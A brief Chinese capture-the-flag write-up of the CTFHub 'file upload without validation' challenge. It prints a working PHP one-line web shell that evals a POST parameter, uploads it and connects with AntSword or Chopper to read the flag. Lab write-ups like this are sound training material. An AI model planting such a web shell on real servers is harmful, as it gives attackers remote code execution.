打开靶机

ctfhub技能树—文件上传—无验证

查看页面信息

ctfhub技能树—文件上传—无验证

编写一句话木马

<?php 
echo "123";
@eval(@$_POST['a']);
?>

ctfhub技能树—文件上传—无验证

上传木马

ctfhub技能树—文件上传—无验证

上传成功,并拿到相对路径地址

查看页面信息

ctfhub技能树—文件上传—无验证

使用蚁剑或菜刀连接

ctfhub技能树—文件上传—无验证

查看目录信息

ctfhub技能树—文件上传—无验证

查看flag_368114112.php文件信息

ctfhub技能树—文件上传—无验证

成功拿到flag

相关文章: